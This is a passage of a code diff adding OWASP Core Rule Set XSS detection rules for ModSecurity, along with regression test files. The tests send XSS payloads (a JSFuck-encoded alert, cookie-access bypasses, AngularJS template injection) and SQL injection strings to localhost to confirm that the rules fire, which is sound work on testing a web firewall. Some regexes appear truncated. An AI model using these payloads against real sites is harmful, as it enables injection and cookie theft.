.*?(?:@[i\\\\]|(?:[:=]|&#x?0*(?:58|3A|61|3D);?).*?(?:[(\\\\]|&#x?0*(?:40|28|92|5C);?)))" \ + "id:941190,\ + phase:2,\ + block,\ + capture,\ + 
t:none,t:utf8toUnicode,t:urlDecodeUni,t:htmlEntityDecode,t:jsDecode,t:cssDecode,t:removeNulls,\ + msg:'IE XSS Filters - Attack Detected',\ + logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ + tag:'application-multi',\ + tag:'language-multi',\ + tag:'platform-multi',\ + tag:'attack-xss',\ + tag:'paranoia-level/1',\ + tag:'OWASP_CRS',\ + tag:'capec/1000/152/242',\ + ctl:auditLogParts=+E,\ + ver:'OWASP_CRS/3.3.5',\ + severity:'CRITICAL',\ + setvar:'tx.xss_score=+%{tx.critical_anomaly_score}',\ + setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'" + + +SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx (?i:<.*[:]?vmlframe.*?[\s/+]*?src[\s/+]*=)" \ + "id:941200,\ + phase:2,\ + block,\ + capture,\ + t:none,t:utf8toUnicode,t:urlDecodeUni,t:htmlEntityDecode,t:jsDecode,t:cssDecode,t:removeNulls,\ + msg:'IE XSS Filters - Attack Detected',\ + logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ + tag:'application-multi',\ + tag:'language-multi',\ + tag:'platform-multi',\ + tag:'attack-xss',\ + tag:'paranoia-level/1',\ + tag:'OWASP_CRS',\ + tag:'capec/1000/152/242',\ + ctl:auditLogParts=+E,\ + ver:'OWASP_CRS/3.3.5',\ + severity:'CRITICAL',\ + setvar:'tx.xss_score=+%{tx.critical_anomaly_score}',\ + setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'" + + +SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx 
(?i:(?:j|&#x?0*(?:74|4A|106|6A);?)(?:\t|&(?:#x?0*(?:9|13|10|A|D);?|tab;|newline;))*(?:a|&#x?0*(?:65|41|97|61);?)(?:\t|&(?:#x?0*(?:9|13|10|A|D);?|tab;|newline;))*(?:v|&#x?0*(?:86|56|118|76);?)(?:\t|&(?:#x?0*(?:9|13|10|A|D);?|tab;|newline;))*(?:a|&#x?0*(?:65|41|97|61);?)(?:\t|&(?:#x?0*(?:9|13|10|A|D);?|tab;|newline;))*(?:s|&#x?0*(?:83|53|115|73);?)(?:\t|&(?:#x?0*(?:9|13|10|A|D);?|tab;|newline;))*(?:c|&#x?0*(?:67|43|99|63);?)(?:\t|&(?:#x?0*(?:9|13|10|A|D);?|tab;|newline;))*(?:r|&#x?0*(?:82|52|114|72);?)(?:\t|&(?:#x?0*(?:9|13|10|A|D);?|tab;|newline;))*(?:i|&#x?0*(?:73|49|105|69);?)(?:\t|&(?:#x?0*(?:9|13|10|A|D);?|tab;|newline;))*(?:p|&#x?0*(?:80|50|112|70);?)(?:\t|&(?:#x?0*(?:9|13|10|A|D);?|tab;|newline;))*(?:t|&#x?0*(?:84|54|116|74);?)(?:\t|&(?:#x?0*(?:9|13|10|A|D);?|tab;|newline;))*(?::|&(?:#x?0*(?:58|3A);?|colon;)).)" \ + "id:941210,\ + phase:2,\ + block,\ + capture,\ + t:none,t:utf8toUnicode,t:urlDecodeUni,t:htmlEntityDecode,t:jsDecode,t:cssDecode,t:removeNulls,\ + msg:'IE XSS Filters - Attack Detected',\ + logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ + tag:'application-multi',\ + tag:'language-multi',\ + tag:'platform-multi',\ + tag:'attack-xss',\ + tag:'paranoia-level/1',\ + tag:'OWASP_CRS',\ + tag:'capec/1000/152/242',\ + ctl:auditLogParts=+E,\ + ver:'OWASP_CRS/3.3.5',\ + severity:'CRITICAL',\ + setvar:'tx.xss_score=+%{tx.critical_anomaly_score}',\ + setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'" + + +SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx 
(?i:(?:v|&#x?0*(?:86|56|118|76);?)(?:\t|&(?:#x?0*(?:9|13|10|A|D);?|tab;|newline;))*(?:b|&#x?0*(?:66|42|98|62);?)(?:\t|&(?:#x?0*(?:9|13|10|A|D);?|tab;|newline;))*(?:s|&#x?0*(?:83|53|115|73);?)(?:\t|&(?:#x?0*(?:9|13|10|A|D);?|tab;|newline;))*(?:c|&#x?0*(?:67|43|99|63);?)(?:\t|&(?:#x?0*(?:9|13|10|A|D);?|tab;|newline;))*(?:r|&#x?0*(?:82|52|114|72);?)(?:\t|&(?:#x?0*(?:9|13|10|A|D);?|tab;|newline;))*(?:i|&#x?0*(?:73|49|105|69);?)(?:\t|&(?:#x?0*(?:9|13|10|A|D);?|tab;|newline;))*(?:p|&#x?0*(?:80|50|112|70);?)(?:\t|&(?:#x?0*(?:9|13|10|A|D);?|tab;|newline;))*(?:t|&#x?0*(?:84|54|116|74);?)(?:\t|&(?:#x?0*(?:9|13|10|A|D);?|tab;|newline;))*(?::|&(?:#x?0*(?:58|3A);?|colon;)).)" \ + "id:941220,\ + phase:2,\ + block,\ + capture,\ + t:none,t:utf8toUnicode,t:urlDecodeUni,t:htmlEntityDecode,t:jsDecode,t:cssDecode,t:removeNulls,\ + msg:'IE XSS Filters - Attack Detected',\ + logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ + tag:'application-multi',\ + tag:'language-multi',\ + tag:'platform-multi',\ + tag:'attack-xss',\ + tag:'paranoia-level/1',\ + tag:'OWASP_CRS',\ + tag:'capec/1000/152/242',\ + ctl:auditLogParts=+E,\ + ver:'OWASP_CRS/3.3.5',\ + severity:'CRITICAL',\ + setvar:'tx.xss_score=+%{tx.critical_anomaly_score}',\ + setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'" + + +SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx (?i)]" \ + "id:941290,\ + phase:2,\ + block,\ + capture,\ + t:none,t:utf8toUnicode,t:urlDecodeUni,t:htmlEntityDecode,t:jsDecode,t:cssDecode,t:removeNulls,\ + msg:'IE XSS Filters - Attack Detected',\ + logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ + tag:'application-multi',\ + tag:'language-multi',\ + tag:'platform-multi',\ + tag:'attack-xss',\ + tag:'paranoia-level/1',\ + tag:'OWASP_CRS',\ + tag:'capec/1000/152/242',\ + ctl:auditLogParts=+E,\ + ver:'OWASP_CRS/3.3.5',\ + severity:'CRITICAL',\ + 
setvar:'tx.xss_score=+%{tx.critical_anomaly_score}',\ + setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'" + + +SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx (?i)]*[\xbe>]|<[^\xbe]*\xbe" \ + "id:941310,\ + phase:2,\ + block,\ + capture,\ + t:none,t:urlDecodeUni,t:lowercase,t:urlDecode,t:htmlEntityDecode,t:jsDecode,\ + msg:'US-ASCII Malformed Encoding XSS Filter - Attack Detected',\ + logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ + tag:'application-multi',\ + tag:'language-multi',\ + tag:'platform-tomcat',\ + tag:'attack-xss',\ + tag:'paranoia-level/1',\ + tag:'OWASP_CRS',\ + tag:'capec/1000/152/242',\ + ctl:auditLogParts=+E,\ + ver:'OWASP_CRS/3.3.5',\ + severity:'CRITICAL',\ + setvar:'tx.xss_score=+%{tx.critical_anomaly_score}',\ + setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'" + +# +# https://nedbatchelder.com/blog/200704/xss_with_utf7.html +# UTF-7 encoding XSS filter evasion for IE. 
+# Reported by Vladimir Ivanov +# + +SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx \+ADw-.*(?:\+AD4-|>)|<.*\+AD4-" \ + "id:941350,\ + phase:2,\ + block,\ + capture,\ + t:none,t:urlDecodeUni,t:urlDecode,t:htmlEntityDecode,t:jsDecode,\ + msg:'UTF-7 Encoding IE XSS - Attack Detected',\ + logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ + tag:'application-multi',\ + tag:'language-multi',\ + tag:'platform-internet-explorer',\ + tag:'attack-xss',\ + tag:'paranoia-level/1',\ + tag:'OWASP_CRS',\ + tag:'capec/1000/152/242',\ + ctl:auditLogParts=+E,\ + ver:'OWASP_CRS/3.3.5',\ + severity:'CRITICAL',\ + setvar:'tx.xss_score=+%{tx.critical_anomaly_score}',\ + setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'" + +# +# Defend against JSFuck and Hieroglyphy obfuscation of Javascript code +# +# https://en.wikipedia.org/wiki/JSFuck +# https://github.com/alcuadrado/hieroglyphy +# +# These JS obfuscations mostly aim for client side XSS exploits, hence the +# integration of this rule into the XSS rule group. But serverside JS could +# also be attacked via these techniques. +# +# Detection pattern / Core elements of JSFuck and Hieroglyphy are the +# following two items: +# !![] +# !+[] +# +# ModSecurity always transforms "+" into " " with query strings and the +# URLENCODE body processor (but not for JSON). So we need to check for +# the following patterns: +# !![] +# !+[] +# ! 
[] + +SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx ![!+ ]\[\]" \ + "id:941360,\ + phase:2,\ + block,\ + capture,\ + t:none,\ + msg:'JSFuck / Hieroglyphy obfuscation detected',\ + logdata:'Matched Data: Suspicious payload found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ + tag:'application-multi',\ + tag:'language-multi',\ + tag:'attack-xss',\ + tag:'paranoia-level/1',\ + tag:'OWASP_CRS',\ + tag:'capec/1000/152/242/63',\ + ctl:auditLogParts=+E,\ + ver:'OWASP_CRS/3.3.5',\ + severity:'CRITICAL',\ + setvar:'tx.xss_score=+%{tx.critical_anomaly_score}',\ + setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'" + +# +# Prevent 941180 bypass by using JavaScript global variables +# Refer to: https://www.secjuice.com/bypass-xss-filters-using-javascript-global-variables/ +# +# Examples: +# - /?search=/?a=";+alert(self["document"]["cookie"]);// +# - /?search=/?a=";+document+/*foo*/+.+/*bar*/+cookie;// +# +SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS|XML:/* "@rx (?:self|document|this|top|window)\s*(?:/\*|[\[)]).+?(?:\]|\*/)" \ + "id:941370,\ + phase:2,\ + block,\ + capture,\ + t:none,t:urlDecodeUni,t:compressWhitespace,\ + msg:'JavaScript global variable found',\ + logdata:'Matched Data: Suspicious JS global variable found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ + tag:'application-multi',\ + tag:'language-multi',\ + tag:'attack-xss',\ + tag:'paranoia-level/1',\ + tag:'OWASP_CRS',\ + tag:'capec/1000/152/242/63',\ + ctl:auditLogParts=+E,\ + ver:'OWASP_CRS/3.3.5',\ + severity:'CRITICAL',\ + setvar:'tx.xss_score=+%{tx.critical_anomaly_score}',\ + setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'" + + +SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 2" "id:941013,phase:1,pass,nolog,skipAfter:END-REQUEST-941-APPLICATION-ATTACK-XSS" +SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 2" "id:941014,phase:2,pass,nolog,skipAfter:END-REQUEST-941-APPLICATION-ATTACK-XSS" +# +# -= Paranoia Level 2 =- 
(apply only when tx.executing_paranoia_level is sufficiently high: 2 or higher) +# + +# +# This is a stricter sibling of rule 941100. +# +SecRule REQUEST_HEADERS:Referer "@detectXSS" \ + "id:941101,\ + phase:2,\ + block,\ + capture,\ + t:none,t:utf8toUnicode,t:urlDecodeUni,t:htmlEntityDecode,t:jsDecode,t:cssDecode,t:removeNulls,\ + msg:'XSS Attack Detected via libinjection',\ + logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ + tag:'application-multi',\ + tag:'language-multi',\ + tag:'platform-multi',\ + tag:'attack-xss',\ + tag:'OWASP_CRS',\ + tag:'capec/1000/152/242',\ + tag:'paranoia-level/2',\ + ctl:auditLogParts=+E,\ + ver:'OWASP_CRS/3.3.5',\ + severity:'CRITICAL',\ + setvar:'tx.xss_score=+%{tx.critical_anomaly_score}',\ + setvar:'tx.anomaly_score_pl2=+%{tx.critical_anomaly_score}'" + + +# +# -=[ XSS Filters - Category 5 ]=- +# HTML attributes - src, style and href +# +SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|REQUEST_HEADERS:User-Agent|ARGS_NAMES|ARGS|XML:/* "@rx (?i)\b(?:s(?:tyle|rc)|href)\b[\s\S]*?=" \ + "id:941150,\ + phase:2,\ + block,\ + capture,\ + t:none,t:utf8toUnicode,t:urlDecodeUni,t:htmlEntityDecode,t:jsDecode,t:cssDecode,t:removeNulls,\ + msg:'XSS Filter - Category 5: Disallowed HTML Attributes',\ + logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ + tag:'application-multi',\ + tag:'language-multi',\ + tag:'platform-multi',\ + tag:'attack-xss',\ + tag:'OWASP_CRS',\ + tag:'capec/1000/152/242',\ + tag:'paranoia-level/2',\ + ctl:auditLogParts=+E,\ + ver:'OWASP_CRS/3.3.5',\ + severity:'CRITICAL',\ + setvar:'tx.xss_score=+%{tx.critical_anomaly_score}',\ + setvar:'tx.anomaly_score_pl2=+%{tx.critical_anomaly_score}'" + + +# Detect tags that are the most common direct HTML injection points. +# +# +# +# +# " + output: + log_contains: id "941330" 
diff --git a/src/common/core/modsecurity/files/coreruleset-v3/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941340.yaml b/src/common/core/modsecurity/files/coreruleset-v3/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941340.yaml
new file mode 100644
index 000000000..46ef16920
--- /dev/null
+++ b/src/common/core/modsecurity/files/coreruleset-v3/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941340.yaml
@@ -0,0 +1,35 @@
+---
+meta:
+ author: "Christian S.J. Peron"
+ description: None
+ enabled: true
+ name: 941340.yaml
+tests:
+ - test_title: 941340-1
+ desc: "IE XSS Filters - Attack"
+ stages:
+ - stage:
+ input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ method: POST
+ port: 80
+ data: "var=' infoo.bar=&var2=whatever"
+ version: HTTP/1.0
+ output:
+ log_contains: id "941340"
+ - test_title: 941340-2
+ desc: "XSS test based on portswigger XSS cheatsheet"
+ stages:
+ - stage:
+ input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ method: POST
+ port: 80
+ data: "payload=XSS"
+ version: HTTP/1.0
+ output:
+ log_contains: id "941340"
diff --git a/src/common/core/modsecurity/files/coreruleset-v3/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941350.yaml b/src/common/core/modsecurity/files/coreruleset-v3/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941350.yaml
new file mode 100644
index 000000000..78be9052e
--- /dev/null
+++ b/src/common/core/modsecurity/files/coreruleset-v3/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941350.yaml
@@ -0,0 +1,22 @@
+---
+meta:
+ author: fgsch
+ enabled: true
+ name: 941350.yaml
+ description: Test rule 941350
+tests:
+ - test_title: 941350-1
+ desc: GH issue 1514
+ stages:
+ - stage:
+ input:
+ dest_addr: 127.0.0.1
+ method: GET
+ port: 80
+ uri: /xx?id=%25252bADw-script%25252bAD4-
+ headers:
+ Accept: "*/*"
+ Host: localhost
+ User-Agent: ModSecurity CRS 3 Tests
+ output:
+ log_contains: id "941350"
diff --git a/src/common/core/modsecurity/files/coreruleset-v3/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941360.yaml b/src/common/core/modsecurity/files/coreruleset-v3/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941360.yaml new file mode 100644 index 000000000..0f8aa29d4 --- /dev/null +++ b/src/common/core/modsecurity/files/coreruleset-v3/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941360.yaml 
@@ -0,0 +1,52 @@ +--- +meta: + author: "Christian Folini" + description: None + enabled: true + name: 941360.yaml +tests: + - test_title: 941360-1 + desc: "JSFuck / Hieroglyphy payload obfuscation attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + method: POST + port: 80 + data: "a=[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]][([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]((![]+[])[+!+[]]+(![]+[])[!+[]+!+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]+(!![]+[])[+[]]+(![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[!+[]+!+[]+[+[]]]+[+!+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[!+[]+!+[]+[+[]]])()" + # Payload represents "alert(1)" in JSFuck encoding + version: HTTP/1.1 + output: + log_contains: id "941360" + - test_title: 941360-2 + desc: "JSFuck / Hieroglyphy payload obfuscation attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + method: POST + port: 80 + data: "a=(![]+[])[+!+[]]" + # Payload represents "a" in JSFuck / Hieroglyphy encoding + version: HTTP/1.1 + output: + log_contains: id 
"941360" + - test_title: 941360-3 + desc: "JSFuck / Hieroglyphy payload obfuscation attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + method: POST + port: 80 + data: "a=+!![]" + # Payload represents "1" in JSFuck / Hieroglyphy encoding + version: HTTP/1.1 + output: + log_contains: id "941360" diff --git a/src/common/core/modsecurity/files/coreruleset-v3/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941370.yaml b/src/common/core/modsecurity/files/coreruleset-v3/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941370.yaml new file mode 100644 index 000000000..a49f951f5 --- /dev/null +++ b/src/common/core/modsecurity/files/coreruleset-v3/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941370.yaml 
@@ -0,0 +1,147 @@
+---
+meta:
+ author: "Andrea Menin"
+ description: None
+ enabled: true
+ name: 941370.yaml
+tests:
+ - test_title: 941370-1
+ desc: "Bypass using comment in syntax and multiple whitespaces"
+ stages:
+ - stage:
+ input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ method: GET
+ port: 80
+ data: "a=document+%2F%2Afoo%2A%2F+.+++++cookie"
+ version: HTTP/1.1
+ output:
+ log_contains: id "941370"
+ - test_title: 941370-2
+ desc: "Bypass using comments in syntax"
+ stages:
+ - stage:
+ input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ method: POST
+ port: 80
+ data: "a=document%2F%2Afoo%2A%2F.%2F%2Abar%2A%2Fcookie"
+ version: HTTP/1.1
+ output:
+ log_contains: id "941370"
+ - test_title: 941370-3
+ desc: "Bypass using JavaScript global variables"
+ stages:
+ - stage:
+ input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ method: GET
+ port: 80
+ data: "a=window%5B%22alert%22%5D%28window%5B%22document%22%5D%5B%22cookie%22%5D%29"
+ version: HTTP/1.1
+ output:
+ log_contains: id "941370"
+ - test_title: 941370-4
+ desc: "Bypass using JavaScript global variables and comments in syntax"
+ stages:
+ - stage:
+ input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ method: GET
+ port: 80
+ data: "a=self%5B%2F%2Afoo%2A%2F%22alert%22%5D%28self%5B%22document%22%2F%2Abar%2A%2F%5D%5B%22cookie%22%5D%29"
+ version: HTTP/1.1
+ output:
+ log_contains: id "941370"
+ - test_title: 941370-5
+ desc: "Bypass using JavaScript global variables and string concatenation"
+ stages:
+ - stage:
+ input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ method: GET
+ port: 80
+ data: "a=self%5B%2F%2Afoo%2A%2F%22alert%22%5D%28self%5B%22document%22%2F%2Abar%2A%2F%5D%5B%22cookie%22%5D%29"
+ version: HTTP/1.1
+ output:
+ log_contains: id "941370"
+ - test_title: 941370-6
+ desc: "Bypass using JavaScript global variables and comments in syntax"
+ stages:
+ - stage:
+ input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ method: GET
+ port: 80
+ data: "a=self++%2F%2Ajhb%2A%2F++%5B++%2F%2Abar%2A%2F++%22alert%22%5D%28%22xss%22%29"
+ version: HTTP/1.1
+ output:
+ log_contains: id "941370"
+ - test_title: 941370-7
+ desc: "Bypass using JavaScript global variables and jQuery globalEval"
+ stages:
+ - stage:
+ input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ method: GET
+ port: 80
+ data: "a=self%5B%22%24%22%5D%5B%22globalEval%22%5D%28%22alert%281%29%22%29"
+ version: HTTP/1.1
+ output:
+ log_contains: id "941370"
+ - test_title: 941370-8
+ desc: "Bypass using JavaScript global variables and hex escape sequence"
+ stages:
+ - stage:
+ input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ method: GET
+ port: 80
+ data: "a=self%5B%22%5Cx24%22%5D"
+ version: HTTP/1.1
+ output:
+ log_contains: id "941370"
+ - test_title: 941370-9
+ desc: "Bypass trying to access document.cookie using alternative syntax like (document)['cookie']"
+ stages:
+ - stage:
+ input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ method: GET
+ port: 80
+ data: "a=%28document%29%5B%22cookie%22%5D"
+ version: HTTP/1.1
+ output:
+ log_contains: id "941370"
+ - test_title: 941370-10
+ desc: "Bypass trying to access document.cookie using alternative syntax and comments like (document/*foo*/)['cookie']"
+ stages:
+ - stage:
+ input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ method: GET
+ port: 80
+ data: "a=%28document%2F%2Afoo%2A%2F%29%5B%22cookie%22%5D"
+ version: HTTP/1.1
+ output:
+ log_contains: id "941370"
diff --git a/src/common/core/modsecurity/files/coreruleset-v3/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941380.yaml b/src/common/core/modsecurity/files/coreruleset-v3/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941380.yaml
new file mode 100644
index 000000000..499396468
--- /dev/null
+++ b/src/common/core/modsecurity/files/coreruleset-v3/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941380.yaml
@@ -0,0 +1,24 @@
+---
+meta:
+ author: "Franziska Buehler"
+ description: None
+ enabled: true
+ name: 941380.yaml
+tests:
+ - test_title: 941380-1
+ desc: "AngularJS client side template injection detection"
+ stages:
+ - stage:
+ input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ Accept: "*/*"
+ User-Agent: "ModSecurity CRS 3 Tests"
+ method: GET
+ port: 80
+ uri: '/login?user=%20x%20%7B%7Bconstructor.constructor(%27alert(1)%27)()%7D%7D%20.%20ff'
+ # /login?user={{constructor.constructor('alert(1)')()}}
+ version: HTTP/1.1
+ output:
+ log_contains: id "941380"
diff --git a/src/common/core/modsecurity/files/coreruleset-v3/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942100.yaml b/src/common/core/modsecurity/files/coreruleset-v3/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942100.yaml
new file mode 100644
index 000000000..6b6576ca2
--- /dev/null
+++ b/src/common/core/modsecurity/files/coreruleset-v3/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942100.yaml
@@ -0,0 +1,217 @@
+---
+meta:
+ author: "Christian Folini"
+ description: Various SQL injection tests
+ enabled: true
+ name: 942100.yaml
+tests:
+ - test_title: 942100-1
+ desc: "Simple SQL Injection"
+ stages:
+ - stage:
+ input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ method: POST
+ port: 80
+ uri: "/"
+ data: "var=1234 OR 1=1"
+ version: HTTP/1.0
+ output:
+ log_contains: id "942100"
+ - test_title: 942100-2
+ desc: "Simple SQL injection"
+ stages:
+ - stage:
+ input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ method: POST
+ port: 80
+ uri: "/"
+ data: "var=-1839' or '1'='1"
+ version: HTTP/1.0
+ output:
+ log_contains: id "942100"
+ - test_title: 942100-3
+ desc: "Simple SQL injection"
+ stages:
+ - stage:
+ input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ method: POST
+ port: 80
+ uri: "/"
+ data: "var=-1839\" or \"1\"=\"2"
+ version: HTTP/1.0
+ output:
+ log_contains: id "942100"
+ - test_title: 942100-4
+ desc: "Basic SQL injection"
+ stages:
+ - stage:
+ input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ method: POST
+ port: 80
+ uri: "/"
+ data: "var=2010-01-01'+sleep(20.to_i)+'"
+ version: HTTP/1.0
+ output:
+ log_contains: id "942100"
+ - test_title: 942100-5
+ desc: "Simple SQL injection"
+ stages:
+ - stage:
+ input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ method: POST
+ port: 80
+ uri: "/"
+ data: "var=EmptyValue' and 526=527"
+ version: HTTP/1.0
+ output:
+ log_contains: id "942100"
+ - test_title: 942100-6
+ desc: "Simple SQL injection"
+ stages:
+ - stage:
+ input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ method: POST
+ port: 80
+ uri: "/"
+ data: "var=foo') UNION ALL select NULL --"
+ version: HTTP/1.0
+ output:
+ log_contains: id "942100"
+ - test_title: 942100-7
+ desc: "Advanced SQL injection"
+ stages:
+ - stage:
+ input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ method: POST
+ port: 80
+ uri: "/"
+ data: "var=foo')waitfor%20delay'5%3a0%3a20'--"
+ version: HTTP/1.0
+ output:
+ log_contains: id "942100"
+ - test_title: 942100-8
+ desc: "Simple SQL Injection"
+ stages:
+ - stage:
+ input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ method: POST
+ port: 80
+ uri: "/"
+ data: "var=JKGHUKGDI8TDHLFJH72FZLFJSKFH' and sleep(12) --"
+ version: HTTP/1.0
+ output:
+ log_contains: id "942100"
+ - test_title: 942100-9
+ desc: "Simple SQL injection"
+ stages:
+ - stage:
+ input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ method: POST
+ port: 80
+ uri: "/"
+ data: "var=/path/to/file/unitests.txt') UNION ALL select NULL --"
+ version: HTTP/1.0
+ output:
+ log_contains: id "942100"
+ - test_title: 942100-10
+ desc: "Advanced SQL Injection"
+ stages:
+ - stage:
+ input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ method: POST
+ port: 80
+ uri: "/"
+ data: "1'||(select extractvalue(xmltype('%toyop;"
+ version: HTTP/1.0
+ output:
+ log_contains: id "942100"
+ - test_title: 942100-11
+ desc: "Simple function call"
+ stages:
+ - stage:
+ input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ method: POST
+ port: 80
+ uri: "/"
+ data: "var=sleep(20)"
+ version: HTTP/1.0
+ output:
+ log_contains: id "942100"
